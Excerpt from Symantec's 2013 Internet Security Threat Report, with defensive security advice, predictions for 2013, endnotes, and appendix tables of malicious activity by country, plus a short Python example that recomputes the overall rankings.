Protect Yourself Against Social Engineering.<br />
For individuals as well as for businesses, it’s essential that people learn to spot the telltale signs of social engineering, which can include undue pressure, titillation or a false sense of urgency, an offer that is literally too good to be true, bogus “officialese” in an attempt to make something look authentic (for example, lengthy reference numbers), implausible pretexts (for example, a Microsoft “representative” calls to tell you that your computer has a virus), and false quid-pro-quo offers (for example, receive a free gift when you provide personal or confidential information).<br />
Avoid Ransomware.<br />
Avoid marginal websites and, in particular, pirate software and adult sites. Do not install unsolicited plug-ins or executables if prompted to do so, even on legitimate websites. Consider using advertising blocker software in your browser. Ensure that your computer is up to date with the latest patches and updates to increase your resistance to drive-by Web infections. Keep backups and recovery disks so you can unlock your computer in an emergency. And, of course, have effective, up-to-date security software.<br />
Think Before You Click.<br />
That unsolicited email from a known acquaintance, such as your mother or coworker, may not be legit. Their account may have been compromised if they’ve fallen for a social engineering trick.<br />
Antivirus on Endpoints Is Not Enough.<br />
On endpoints (desktops/laptops), signature-based antivirus alone is not enough to protect against today’s threats and Web-based attack toolkits. Deploy and use a comprehensive endpoint security product that includes additional layers of protection, including:<br />
• Endpoint intrusion prevention that protects against unpatched vulnerabilities being exploited, protects against social engineering attacks, and stops malware from ever making it onto endpoints;<br />
• Browser protection for protection against obfuscated Web-based attacks;<br />
• Heuristic file-based malware prevention to provide more intelligent protection against unknown threats;<br />
• File and Web-based reputation solutions that provide a risk-and-reputation rating of any application and website to prevent rapidly mutating and polymorphic malware;<br />
• Behavioral prevention capabilities that look at the behavior of applications and malware and prevent malware;<br />
• Application control settings that can prevent applications and browser plug-ins from downloading unauthorized malicious content;<br />
• Device control settings that prevent and limit the types of USB devices that can be used.
p. 53<br />
LOOKING AHEAD
p. 54<br />
Looking Ahead<br />
“Never make predictions,” said a wise man, “especially about the future.” But we can extrapolate from this year’s data to speculate on future trends in the hope that this will help organizations and individuals protect themselves more effectively. Looking ahead, here are our priorities and concerns for the coming year:<br />
More State-sponsored Cyber Attacks<br />
The last few years have seen increasingly sophisticated and widespread use of cyber attacks. In peacetime, they provide plausible deniability; in wartime, they could be an essential tool. Cyber attacks will continue to be an outlet where tensions between countries are played out. Moreover, in addition to state-sponsored attacks, non-state-sponsored attacks, including attacks by nationalist activists against those whom they perceive to be acting against their country’s interest, will continue. Security companies and businesses need to be prepared for blowback and collateral damage from these attacks and, as ever, they need to make strenuous efforts to protect themselves against targeted attacks of all kinds.<br />
Sophisticated Attack Techniques Trickle Down<br />
Know-how used for industrial espionage or cyberwarfare will be reverse-engineered by criminal hackers for commercial gain. For example, the zero-day exploits used by the Elderwood Gang will be reused by other malware authors. Similarly, the “open-sourcing” of malware toolkits such as Zeus (also known as Zbot), perhaps in an effort to throw law enforcement off the trail of the original authors, will make it easier for authors to create new malware.<br />
Websites Will Become More Dangerous<br />
Drive-by infections from websites will become even more common and even harder to block without advanced security software. Criminals will increasingly attack websites, using malvertising and website attack kits, as a means of infecting users. Software vendors will come under pressure to increase their efforts in fixing vulnerabilities promptly. Users and the companies that employ them will need to be more proactive about maintaining their privacy and security in this new social media world.<br />
Social Media Will Be a Major Security Battleground<br />
Social media websites already combine elements of an operating system, a communications platform, and an advertising network. As they go mobile and add payment mechanisms, they will attract even more attention from online criminals with malware, phishing, spam, and scams. Traditional spam, phishing, and malware will hold steady or decline somewhat; however, social media attacks will grow enormously. As new social media tools emerge and become popular, criminals will target them. Further, we think that the intersection of smartphones and social media will become an important security battleground as criminals target teenagers, young adults, and other people who may be less guarded about their personal data and insufficiently security-minded to protect their devices and avoid scams.<br />
Attacks Against Cloud Providers Will Increase<br />
So far, the very big data breaches have occurred in businesses that collect a lot of personal data, such as healthcare providers, online retailers, or games companies. In 2013 we expect to see a variety of attacks against cloud software providers.<br />
Increasingly Vicious Malware<br />
Malware has advanced from being predominantly about data theft and botnets (although both are still very common) through fake antivirus scams to increased ransomware attacks in 2012. We expect to see these attacks become harder to undo, more aggressive, and more professional over time. Once criminals see that they can get a high conversion rate from this kind of extortion, we may see other manifestations, such as malware that threatens to, and then actually does, delete the contents of your hard disk. This was the case with the Shamoon attacks that occurred in August and erased data from infected computers. Essentially, if it is possible, someone will try it; if it is profitable, many people will do it.
p. 55<br />
Mobile Malware Comes of Age<br />
Just as social media is becoming the new “operating system” for computers, mobile phones and tablets are becoming the new hardware platform. Tablet adoption and smartphone market penetration will continue, and this will attract criminals. What evolved over a decade on PCs is emerging more rapidly on smartphones and tablets. We’ll see ransomware and drive-by website infections on these new platforms in the coming year. For businesses that use these new devices or allow employees to bring their own to work, this will present a serious security problem in 2013.<br />
Persistent Phishing<br />
Identities are valuable, so criminals will continue to try to steal them. Phishing attacks will continue to get smarter and more sophisticated. For example, we’ll see more perfect site replicas and SSL-encrypted phishing sites. Phishing will become more regional, and it will appear in a wider variety of languages, making it harder to block and more effective. It will continue its spread on social media websites, where it will exploit the medium’s virality and trusted messaging.
p. 56<br />
Endnotes<br />
01 See http://www.defense.gov/transcripts/transcript.aspx?transcriptid=5136.<br />
02 See http://krebsonsecurity.com/2012/03/mastercard-visa-warn-of-processor-breach/.<br />
03 See http://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf.<br />
04 Aviation Week & Space Technology, October 22, 2012, 82.<br />
05 See http://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf.<br />
06 The data for the data breaches that could lead to identity theft is procured from the Norton Cybercrime Index (CCI). The Norton CCI is a statistical model that measures the levels of threats including malicious software, fraud, identity theft, spam, phishing, and social engineering daily. Data for the CCI is primarily derived from the Symantec Global Intelligence Network and, for certain data, from ID Analytics. The majority of the Norton CCI’s data comes from Symantec’s Global Intelligence Network, one of the industry’s most comprehensive sources of intelligence about online threats. The data breach section of the Norton CCI is derived from data breaches that have been reported by legitimate media sources and have exposed personal information, including name, address, Social Security numbers, credit card numbers, or medical history. Using publicly available data, the Norton CCI determines the sectors that were most often affected by data breaches, as well as the most common causes of data loss.<br />
07 See http://www.symantec.com/content/en/us/about/media/pdfs/b-ponemon-2011-cost-of-data-breach-global.en-us.pdf.<br />
08 See http://www.symantec.com/connect/blogs/shamoon-attacks.<br />
09 Internet Security Threat Report, April 2012, “Targeted Attacks,” 16.<br />
10 See http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf.<br />
11 See http://www.symantec.com/connect/blogs/cve-2012-1875-exploited-wild-part-1-trojannaid.<br />
12 See http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf.<br />
13 See http://www.symantec.com/connect/blogs/cost-cybercrime-2012.<br />
14 See http://www.symantec.com/connect/blogs/lizamoon-mass-sql-injection-tried-and-tested-formula.<br />
15 See http://www.symantec.com/connect/blogs/danger-malware-ahead-please-not-my-site.<br />
16 See http://www.securityweek.com/comodo-certificates-used-sign-banking-trojans-brazil.<br />
17 See http://blog.nielsen.com/nielsenwire/social/2012/.<br />
18 See http://www.symantec.com/connect/blogs/instaspam-instagram-users-receive-gift-card-spam.<br />
19 See http://www.gartner.com/it/page.jsp?id=2237315.<br />
20 See http://en.wikipedia.org/wiki/FinFisher and http://www.nytimes.com/2012/08/31/technology/finspy-software-is-tracking-political-dissidents.html?_r=1.<br />
21 See http://www.symantec.com/connect/blogs/androidbmaster-million-dollar-mobile-botnet.<br />
22 See http://www.symantec.com/connect/blogs/androidbmaster-million-dollar-mobile-botnet.<br />
23 See http://news.cnet.com/8301-1009_3-57470729-83/malware-went-undiscovered-for-weeks-on-google-play.<br />
24 See http://developer.android.com/about/dashboards/index.html.<br />
25 See http://www.gartner.com/it/page.jsp?id=2163616.<br />
26 See http://www.wired.com/threatlevel/2011/06/dropbox/.<br />
27 For more advice about cloud adoption, see https://www4.symantec.com/mktginfo/.<br />
28 In the United States, for example, the NTSB reports that 472 people died in aircraft accidents in 2010 compared with 32,885 in highway accidents. See http://www.ntsb.gov/data/index.html.<br />
29 See http://www.symantec.com/about/news/release/article.jsp?prid=20120905_02.<br />
30 See http://www.npr.org/blogs/money/2013/01/15/169424047/episode-430-black-market-pharmacies-and-the-spam-empire-behind-them.<br />
31 See http://www.symantec.com/security_response/writeup.jsp?docid=2012-041001-0020-99.<br />
32 See http://www.symantec.com/connect/blogs/flashback-cleanup-still-underway-approximately-140000-infections.<br />
33 See http://www.symantec.com/connect/blogs/both-mac-and-windows-are-targeted-once.<br />
34 See http://krebsonsecurity.com/tag/planet-money/.
INTERNET SECURITY THREAT REPORT<br />
APPENDIX 2013<br />
2012 Trends, Volume 18, Published April 2013
p. 58<br />
CONTENTS<br />
61 Appendix :: A – Threat Activity Trends<br />
63 Malicious Activity by Source<br />
64 Malicious Activity by Source: Overall Rankings, 2011–2012<br />
65 Malicious Activity by Source: Malicious Code, 2011–2012<br />
65 Malicious Activity by Source: Spam Zombies, 2011–2012<br />
66 Malicious Activity by Source: Phishing Hosts, 2011–2012<br />
66 Malicious Activity by Source: Bots, 2011–2012<br />
67 Malicious Activity by Source: Web Attack Origins, 2011–2012<br />
67 Malicious Activity by Source: Network Attack Origins, 2011–2012<br />
69 Malicious Web-based Attack Prevalence<br />
69 Malicious Website Activity, 2011–2012<br />
71 Analysis of Malicious Web Activity by Attack Toolkits<br />
71 Malicious Website Activity: Attack Toolkit Trends, 2012<br />
72 Malicious Website Activity: Overall Frequency of Major Attack Toolkits, 2012<br />
73 Analysis of Web-based Spyware, Adware, and Potentially Unwanted Programs<br />
73 Potentially Unwanted Programs: Spyware and Adware Blocked, 2012<br />
75 Analysis of Web Policy Risks from Inappropriate Use<br />
75 Web Policies that Triggered Blocks, 2011–2012<br />
77 Analysis of Website Categories Exploited to Deliver Malicious Code<br />
77 Malicious Web Activity: Categories that Delivered Malicious Code, 2012<br />
78 Malicious Web Activity: Malicious Code by Number of Infections Per Site, 2012<br />
78 Malicious Web Activity: Fake Antivirus by Category, 2012<br />
79 Malicious Web Activity: Browser Exploits by Category, 2012<br />
79 Malicious Web Activity: Social Networking Attacks by Category, 2012<br />
81 Bot-infected Computers<br />
82 Table of Top 10 Bot Locations by Average Lifespan of Bot, 2011–2012<br />
83 Analysis of Mobile Threats<br />
83 Android Mobile Threats: Newly Discovered Malicious Code, 2011–2012<br />
84 Android Mobile Threats: Cumulative Number of Malware Families, 2010–2012<br />
85 Mobile Threats: Malicious Code by Type, 2012<br />
85 Mobile Threats: Malicious Code by Type – Additional Detail, 2012<br />
86 Documented Mobile Vulnerabilities, 2012<br />
89 Data Breaches that Could Lead to Identity Theft<br />
90 Timeline of Data Breaches Showing Identities Breached in 2012, Global<br />
90 Data Breaches that Could Lead to Identity Theft (Top 10 Sectors by Number of Data Breaches)<br />
91 Data Breaches that Could Lead to Identity Theft (Top 10 Sectors by Number of Identities Exposed)<br />
91 Average Number of Identities Exposed Per Data Breach by Notable Sector<br />
92 Data Breaches that Could Lead to Identity Theft by Number of Breaches<br />
92 Data Breaches that Could Lead to Identity Theft by Number of Identities Exposed<br />
93 Average Number of Identities Exposed Per Data Breach by Cause<br />
93 Type of Information Exposed in Deliberate Breaches<br />
94 Threat Activity Trends Endnotes
p. 59<br />
95 Appendix :: B – Malicious Code Trends<br />
97 Top Malicious Code Families<br />
98 Overall Top Malicious Code Families, 2012<br />
99 Relative Volume of Reports of Top 10 Malicious Code Families in 2012 by Percentage<br />
99 Relative Proportion of Top 10 Malicious Code Blocked in Email Traffic by Symantec.cloud in 2012 by Percentage and Ratio<br />
100 Trend of Malicious Code Blocked in Email Traffic by Symantec.cloud – 2011 vs 2012<br />
100 Relative Proportion of Top 10 Malicious Code Blocked in Web Traffic by Symantec.cloud in 2012 by Percentage and Ratio<br />
102 Analysis of Malicious Code Activity by Geography, Industry Sector, and Company Size<br />
102 Proportion of Email Traffic Identified as Malicious, by Industry Sector, 2012<br />
103 Proportion of Email Traffic Identified as Malicious by Organization Size, 2012<br />
103 Proportion of Email Traffic Identified as Malicious by Geographic Location, 2012<br />
105 Propagation Mechanisms<br />
106 Propagation Mechanisms<br />
108 Industrial Espionage: Targeted Attacks and Advanced Persistent Threats (APTs)<br />
109 Average Number of Targeted Email Attacks Per Day, 2012<br />
111 Targeted Attacks by Company Size, 2012<br />
111 Targeted Attacks Against Job Function, 2012<br />
112 Breakdown of Document Types Being Attached to Targeted Attacks, 2012<br />
113 Analysis of Targeted Attacks by Top 10 Industry Sectors, 2012<br />
114 Malicious Code Trends Endnotes<br />
115 Appendix :: C – Spam and Fraud Activity Trends<br />
117 Analysis of Spam Activity Trends<br />
117 Global Spam Volume in Circulation, 2012<br />
118 Proportion of Email Traffic Identified as Spam, 2011–2012<br />
119 Analysis of Spam Activity by Geography, Industry Sector, and Company Size<br />
119 Proportion of Email Traffic Identified as Spam by Industry Sector, 2012<br />
120 Proportion of Email Traffic Identified as Spam by Organization Size, 2012<br />
120 Proportion of Email Traffic Identified as Spam by Geographic Location, 2012<br />
122 Analysis of Spam Delivered by Botnets<br />
122 Percentage of Spam Sent from Botnets in 2012<br />
123 Analysis of Spam-sending Botnet Activity, 2012<br />
124 Significant Spam Tactics<br />
124 Frequency of Spam Messages by Size, 2012<br />
125 Proportion of Spam Messages Containing URLs, 2012<br />
125 Analysis of Top-level Domains Used in Spam URLs, 2012<br />
126 Spam by Category<br />
127 Spam by Category, 2012<br />
128 Spam by Category, 2012<br />
129 Phishing Activity Trends<br />
129 Phishing Rates, 2011–2012<br />
130 Phishing Category Types, Top 200 Organizations, 2012<br />
130 Tactics of Phishing Distribution, 2012<br />
132 Analysis of Phishing Activity by Geography, Industry Sector, and Company Size<br />
132 Proportion of Email Traffic Identified as Phishing by Industry Sector, 2012
p. 60<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
133 Proportion of Email Traffic Identified as Phishing by Organization Size, 2012<br />
133 Proportion of Email Traffic Identified as Phishing by Geographic Location, 2012<br />
135 Spam and Fraud Activity Endnotes<br />
136 Appendix :: D<br />
Vulnerability Trends<br />
138 Total Number of Vulnerabilities<br />
139 Total Vulnerabilities Identified, 2006–2012<br />
139 New Vulnerabilities Month by Month, 2011 and 2012<br />
140 Most Frequently Attacked Vulnerabilities in 2012<br />
142 Zero-day Vulnerabilities<br />
142 Volume of Zero-day Vulnerabilities, 2006–2012<br />
143 Zero-day Vulnerabilities Identified in 2012<br />
144 Web Browser Vulnerabilities<br />
144 Browser Vulnerabilities, 2011 and 2012<br />
146 Web Browser Plug-in Vulnerabilities<br />
147 Browser Plug-in Vulnerabilities in 2011 and 2012<br />
148 Web Attack Toolkits<br />
149 SCADA Vulnerabilities<br />
150 Vulnerability Trends Endnotes<br />
151 Appendix :: E<br />
Government Threat Activity Trends<br />
153 Malicious Activity by Critical Infrastructure Sector<br />
153 Malicious Activity by Critical Infrastructure Sector<br />
154 Sources of Origin for Government-targeted Attacks<br />
154 Sources of Origin for Government-targeted Attacks<br />
156 Attacks by Type – Overall Government and Critical Infrastructure Organizations<br />
157 Attacks by Type – Notable Critical Infrastructure Sectors<br />
158 Government Threat Activity Endnotes<br />
159 About Symantec<br />
159 More Information
APPENDIX :: A<br />
THREAT ACTIVITY TRENDS
Threat Activity Trends<br />
The Symantec Global Internet Security Threat Report provides an analysis of threat activity,<br />
as well as other malicious activity, data breaches, and Web-based attacks that Symantec<br />
observed in 2012. The malicious activity discussed in this section not only includes threat<br />
activity, but also phishing, malicious code, spam zombies, bot-infected computers, and<br />
attack origins.<br />
Attacks are defined as any malicious activity carried out over a network that has been<br />
detected by an intrusion detection system (IDS) or firewall. Definitions for the other<br />
types of malicious activities can be found in their respective sections within this report.<br />
This section covers the following metrics and provides analysis and discussion of the trends indicated by the data:<br />
• Malicious Activity by Source<br />
• Malicious Web-based Attack Prevalence<br />
• Analysis of Malicious Web Activity by Attack Toolkits<br />
• Analysis of Web-based Spyware, Adware, and Potentially Unwanted Programs<br />
• Analysis of Web Policy Risks from Inappropriate Use<br />
• Analysis of Website Categories Exploited to Deliver Malicious Code<br />
• Bot-infected Computers<br />
• Analysis of Mobile Threats<br />
• Data Breaches that Could Lead to Identity Theft
Malicious Activity by Source<br />
Background<br />
Malicious activity usually affects computers that are connected<br />
to high-speed broadband Internet because these connections are<br />
attractive targets for attackers. Broadband connections provide<br />
larger bandwidth capacities than other connection types,<br />
faster speeds, the potential of constantly connected systems,<br />
and a typically more stable connection. Symantec categorizes<br />
malicious activities as follows:<br />
Malicious code: This includes programs such as viruses,<br />
worms, and Trojans that are covertly inserted into programs.<br />
The purposes of malicious code include destroying data,<br />
running destructive or intrusive programs, stealing sensitive<br />
information, or compromising the <strong>security</strong> or integrity of a<br />
victim’s computer data.<br />
Spam zombies: These are remotely controlled, compromised<br />
systems specifically designed to send out large volumes of<br />
junk or unsolicited email messages. These email messages<br />
can be used to deliver malicious code and phishing attempts.<br />
Phishing hosts: A phishing host is a computer that provides<br />
website services in order to illegally gather sensitive user<br />
information while pretending that the attempt is from a<br />
trusted, well-known organization by presenting a website<br />
designed to mimic the site of a legitimate business.<br />
Bot-infected computers: Malicious programs have been<br />
used to compromise these computers to allow an attacker<br />
to control the targeted system remotely. Typically, a remote<br />
attacker controls a large number of compromised computers<br />
over a single, reliable channel in a botnet, which can then be<br />
used to launch coordinated attacks.<br />
Network attack origins: This measures the originating<br />
sources of attacks from the Internet. For example, attacks<br />
can target SQL protocols or buffer overflow vulnerabilities.<br />
Web-based attack origins: This measures attack sources<br />
that are delivered via the Web or through HTTP. Typically,<br />
legitimate websites are compromised and used to attack<br />
unsuspecting visitors.<br />
Methodology<br />
This metric assesses the sources from which the largest amount<br />
of malicious activity originates. To determine malicious activity<br />
by source, Symantec has compiled geographical data on<br />
numerous malicious activities, namely: malicious code reports,<br />
spam zombies, phishing hosts, bot-infected computers, network<br />
attack origins, and Web-based attack origins. The proportion<br />
of each activity originating in each source is then determined.<br />
The mean of these percentages across all six activities is then<br />
calculated for each source. This mean is taken as the proportion<br />
of overall malicious activity originating from that source, and<br />
the sources are ranked by it.
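As an added illustration of the averaging just described (example code, not Symantec's own tooling), the following Python computes the overall average, ranking and year-on-year change from the six per-activity shares. The input values are the ones the per-activity figures in this appendix give for the United States and China, the two sources that appear in all six top-10 lists, so the results can be checked against Figure A.1.

```python
"""Reproduce the 'Malicious Activity by Source' overall ranking.

Added example, not Symantec's own tooling. The per-activity shares
below are the 2012 and 2011 values from Figures A.2 to A.7 for the two
sources present in all six top-10 lists (United States and China).
"""
from statistics import mean

# The six activities the methodology names, in figure order.
ACTIVITIES = (
    "malicious_code", "spam_zombies", "phishing_hosts",
    "bots", "web_attack_origins", "network_attack_origins",
)

# Share of worldwide activity by source, per activity, as published.
PER_ACTIVITY = {
    2012: {
        "United States": dict(zip(ACTIVITIES, (17.2, 4.2, 50.0, 15.3, 34.4, 14.9))),
        "China": dict(zip(ACTIVITIES, (6.1, 3.1, 3.2, 15.0, 9.4, 29.2))),
    },
    2011: {
        "United States": dict(zip(ACTIVITIES, (13.3, 1.8, 48.5, 12.6, 33.5, 16.9))),
        "China": dict(zip(ACTIVITIES, (5.1, 2.6, 3.1, 6.6, 11.0, 26.9))),
    },
}


def overall_average(shares):
    """Mean of one source's share across all six activities.

    The published tables only list the top 10 per activity, so a source
    missing from one of them has an unknown (not zero) share there.
    Refuse to compute rather than silently under-count such a source.
    """
    missing = [a for a in ACTIVITIES if a not in shares]
    if missing:
        raise ValueError(f"no share for {missing}; mean would be wrong")
    return mean(shares[a] for a in ACTIVITIES)


def rank_sources(year):
    """Return [(source, overall %)] sorted from highest to lowest."""
    scored = [(src, overall_average(sh)) for src, sh in PER_ACTIVITY[year].items()]
    return sorted(scored, key=lambda item: item[1], reverse=True)


def yearly_change(source, year=2012, prior=2011):
    """Percentage-point change, computed on the unrounded means
    (22.67 - 21.10 gives the 1.6 shown for the United States)."""
    now = overall_average(PER_ACTIVITY[year][source])
    before = overall_average(PER_ACTIVITY[prior][source])
    return now - before


if __name__ == "__main__":
    for year in (2012, 2011):
        for pos, (src, avg) in enumerate(rank_sources(year), start=1):
            print(f"{year} #{pos} {src}: {avg:.1f}%")
    for src in ("United States", "China"):
        print(f"{src} change 2011 to 2012: {yearly_change(src):+.1f} pp")
```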
Data<br />
Figure A.1. Malicious Activity by Source: Overall Rankings, 2011–2012<br />
Source: Symantec<br />
Geography | 2012 World Rank | 2012 Overall Average | 2011 World Rank | 2011 Overall Average | Change<br />
United States | 1 | 22.7% | 1 | 21.1% | 1.6%<br />
China | 2 | 11.0% | 2 | 9.2% | 1.8%<br />
India | 3 | 6.5% | 3 | 6.2% | 0.3%<br />
Brazil | 4 | 4.0% | 4 | 4.1% | -0.1%<br />
Germany | 5 | 3.4% | 5 | 3.9% | -0.5%<br />
Netherlands | 6 | 2.7% | 20 | 1.1% | 1.6%<br />
Italy | 7 | 2.4% | 9 | 2.7% | -0.3%<br />
United Kingdom | 8 | 2.4% | 7 | 3.2% | -0.8%<br />
Taiwan | 9 | 2.3% | 8 | 3.0% | -0.7%<br />
Russia | 10 | 2.2% | 6 | 3.2% | -1.0%
Figure A.2. Malicious Activity by Source: Malicious Code, 2011–2012<br />
Source: Symantec<br />
Geography | 2012 Malicious Code Rank | 2012 Malicious Code % | 2011 Malicious Code Rank | 2011 Malicious Code % | Change<br />
United States | 1 | 17.2% | 2 | 13.3% | 3.9%<br />
India | 2 | 16.2% | 1 | 15.3% | 0.9%<br />
China | 3 | 6.1% | 4 | 5.1% | 0.9%<br />
Indonesia | 4 | 3.9% | 3 | 8.0% | -4.1%<br />
Japan | 5 | 3.4% | 11 | 2.2% | 1.2%<br />
Vietnam | 6 | 3.0% | 6 | 3.8% | -0.8%<br />
Brazil | 7 | 2.9% | 8 | 2.8% | 0.0%<br />
United Kingdom | 8 | 2.7% | 5 | 4.0% | -1.3%<br />
Egypt | 9 | 2.6% | 7 | 3.4% | -0.8%<br />
Germany | 10 | 2.5% | 15 | 1.5% | 1.0%<br />
Figure A.3. Malicious Activity by Source: Spam Zombies, 2011–2012<br />
Source: Symantec<br />
Geography | 2012 Spam Zombies Rank | 2012 Spam Zombies % | 2011 Spam Zombies Rank | 2011 Spam Zombies % | Change<br />
India | 1 | 17.1% | 1 | 17.5% | -0.3%<br />
Saudi Arabia | 2 | 7.0% | 19 | 1.5% | 5.6%<br />
Netherlands | 3 | 6.5% | 27 | 0.7% | 5.8%<br />
Brazil | 4 | 5.5% | 5 | 6.0% | -0.5%<br />
United States | 5 | 4.2% | 15 | 1.8% | 2.4%<br />
Spain | 6 | 4.0% | 21 | 1.4% | 2.6%<br />
Argentina | 7 | 3.8% | 12 | 2.2% | 1.6%<br />
Germany | 8 | 3.6% | 23 | 1.2% | 2.4%<br />
China | 9 | 3.1% | 9 | 2.6% | 0.5%<br />
Russia | 10 | 2.7% | 3 | 7.8% | -5.0%
Figure A.4. Malicious Activity by Source: Phishing Hosts, 2011–2012<br />
Source: Symantec<br />
Geography | 2012 Phishing Hosts Rank | 2012 Phishing Hosts % | 2011 Phishing Hosts Rank | 2011 Phishing Hosts % | Change<br />
United States | 1 | 50.0% | 1 | 48.5% | 1.4%<br />
Germany | 2 | 6.2% | 2 | 6.8% | -0.6%<br />
United Kingdom | 3 | 3.9% | 3 | 3.6% | 0.2%<br />
Brazil | 4 | 3.6% | 8 | 2.3% | 1.3%<br />
China | 5 | 3.2% | 5 | 3.1% | 0.2%<br />
Canada | 6 | 2.9% | 4 | 3.3% | -0.4%<br />
France | 7 | 2.7% | 7 | 2.4% | 0.3%<br />
Russia | 8 | 2.4% | 9 | 2.3% | 0.0%<br />
Netherlands | 9 | 2.3% | 6 | 2.4% | -0.1%<br />
Poland | 10 | 1.6% | 12 | 1.6% | -0.1%<br />
Figure A.5. Malicious Activity by Source: Bots, 2011–2012<br />
Source: Symantec<br />
Geography | 2012 Bots Rank | 2012 Bots % | 2011 Bots Rank | 2011 Bots % | Change<br />
United States | 1 | 15.3% | 1 | 12.6% | 2.8%<br />
China | 2 | 15.0% | 6 | 6.6% | 8.4%<br />
Taiwan | 3 | 7.9% | 2 | 11.4% | -3.5%<br />
Brazil | 4 | 7.8% | 3 | 8.9% | -1.1%<br />
Italy | 5 | 7.6% | 4 | 8.3% | -0.7%<br />
Japan | 6 | 4.6% | 8 | 4.6% | 0.0%<br />
Poland | 7 | 4.4% | 7 | 5.4% | -1.0%<br />
Hungary | 8 | 4.2% | 9 | 4.3% | -0.1%<br />
Germany | 9 | 4.0% | 5 | 7.0% | -2.9%<br />
Spain | 10 | 3.2% | 11 | 2.6% | 0.6%
Figure A.6. Malicious Activity by Source: Web Attack Origins, 2011–2012<br />
Source: Symantec<br />
Geography | 2012 Web Attacking Countries Rank | 2012 Web Attacking Countries % | 2011 Web Attacking Countries Rank | 2011 Web Attacking Countries % | Change<br />
United States | 1 | 34.4% | 1 | 33.5% | 0.9%<br />
China | 2 | 9.4% | 2 | 11.0% | -1.6%<br />
Korea, South | 3 | 3.0% | 3 | 4.4% | -1.4%<br />
Germany | 4 | 2.6% | 4 | 3.5% | -0.9%<br />
Netherlands | 5 | 2.4% | 8 | 2.0% | 0.5%<br />
India | 6 | 1.7% | 14 | 1.0% | 0.6%<br />
Japan | 7 | 1.6% | 6 | 2.2% | -0.6%<br />
Russia | 8 | 1.5% | 7 | 2.1% | -0.6%<br />
United Kingdom | 9 | 1.5% | 5 | 2.3% | -0.8%<br />
Brazil | 10 | 1.3% | 11 | 1.3% | 0.0%<br />
Figure A.7. Malicious Activity by Source: Network Attack Origins, 2011–2012<br />
Source: Symantec<br />
Geography | 2012 Network Attacking Countries Rank | 2012 Network Attacking Countries % | 2011 Network Attacking Countries Rank | 2011 Network Attacking Countries % | Change<br />
China | 1 | 29.2% | 1 | 26.9% | 2.3%<br />
United States | 2 | 14.9% | 2 | 16.9% | -1.9%<br />
Russia | 3 | 3.7% | 5 | 3.4% | 0.3%<br />
United Kingdom | 4 | 3.1% | 3 | 4.1% | -0.9%<br />
Brazil | 5 | 3.0% | 6 | 3.2% | -0.2%<br />
Netherlands | 6 | 2.6% | 21 | 0.8% | 1.8%<br />
Japan | 7 | 2.4% | 8 | 2.5% | 0.0%<br />
India | 8 | 2.4% | 11 | 2.0% | 0.4%<br />
Italy | 9 | 2.4% | 7 | 2.8% | -0.4%<br />
France | 10 | 2.3% | 10 | 2.1% | 0.2%
Commentary<br />
• In 2012, corresponding with their large Internet<br />
populations, the United States and China remained the<br />
top two sources overall for malicious activity: The overall<br />
average proportion of attacks originating from the United<br />
States in 2012 increased by 1.6 percentage points compared<br />
with 2011, while the same figure for China saw an increase<br />
by 1.8 percentage points compared with 2011. Malicious<br />
activity in the Netherlands also increased by 1.6 percentage<br />
points, resulting in the country being ranked in sixth<br />
position, compared with twentieth in 2011.<br />
• 29.2 percent of network attacks originated in China: China<br />
has the largest population of Internet users 1 in the Asia<br />
region, with its Internet population growing to 564 million<br />
in 2012.<br />
• 50.0 percent of phishing websites were hosted in the<br />
United States: In 2012, with approximately 275 million<br />
Internet users, the United States has the second largest<br />
population of Internet users in the world.<br />
• The United States was ranked in first position as the<br />
source of all activities except spam zombies, for which India<br />
was ranked first, and network attacks, for which China was<br />
ranked first.<br />
• 15.3 percent of bot activity originated in the United States:<br />
The United States was the main source of bot-infected<br />
computers, an increase of 2.8 percentage points compared<br />
with 2011.<br />
• 34.4 percent of Web-based attacks originated in the United<br />
States: Web-based attacks originating from the United<br />
States increased by 0.9 percentage points in 2012.<br />
• 17.1 percent of spam zombies were located in India, a<br />
decrease of 0.3 percentage points compared with 2011:<br />
The proportion of spam zombies located in the United<br />
States rose by 2.4 percentage points to 4.2 percent, resulting<br />
in the United States being ranked in fifth position in 2012,<br />
compared with fifteenth position in 2011.<br />
• 17.2 percent of all malicious code activities originated<br />
from the United States, an increase of 3.9 percentage<br />
points compared with 2011, overtaking India as the<br />
main source of malicious code activity in 2012: With<br />
16.2 percent of malicious activity originating in India,<br />
the country was ranked in second position. India has<br />
approximately 150 million Internet users, which is the<br />
third largest population of Internet users in the world.
Malicious Web-based Attack Prevalence<br />
Background<br />
The circumstances and implications of Web-based attacks vary<br />
widely. They may target specific businesses or organizations,<br />
or they may be widespread attacks of opportunity that exploit<br />
current events, zero-day vulnerabilities, or recently patched and<br />
publicized vulnerabilities that many users have yet to protect<br />
themselves against. While major attacks may have individual<br />
importance and often receive significant attention when they<br />
occur, examining overall Web-based attacks provides insight<br />
into the threat landscape and how attack patterns may be<br />
shifting. Analysis of the underlying trend can provide insight<br />
into potential shifts in Web-based attack usage and can assist<br />
in determining if attackers are more or less likely to employ<br />
Web-based attacks in the future. To see which vulnerabilities<br />
are being exploited by Web-based attacks, see Appendix D:<br />
Vulnerability Trends.<br />
Data<br />
Figure A.8. Malicious Website Activity, 2011–2012<br />
Source: Symantec<br />
[Chart: average number of malicious websites blocked per day, in thousands (0–400), by month from July 2011 to December 2012]<br />
Methodology<br />
This metric assesses changes to the prevalence of Web-based<br />
attack activity by comparing the overall volume of activity and<br />
the average number of attacks per day in each month during the<br />
current and previous reporting periods.
Commentary<br />
• The average number of malicious websites blocked each<br />
day rose by approximately 30 percent for all of 2012 to an<br />
average of 247,350, compared with 190,370 in the second<br />
half of 2011. A rise in attacks at the beginning of the year<br />
contributed in large part to this increase.<br />
• The average number of websites blocked each day in the<br />
first half of 2012 rose by 48 percent compared with the second<br />
half of 2011, to an average of 281,283.<br />
• The average number of websites blocked each day in the<br />
second half of 2012 compared with the second half of 2011<br />
rose by 12 percent to an average of 213,417.<br />
• The peak rate of malicious activity was 339,078 blocks per<br />
day in March 2012, when the number of malicious blocks<br />
was 37 percent higher than the annual average.<br />
• The lowest rate of malicious activity was 125,384 blocks<br />
per day in December 2012, when the number of malicious<br />
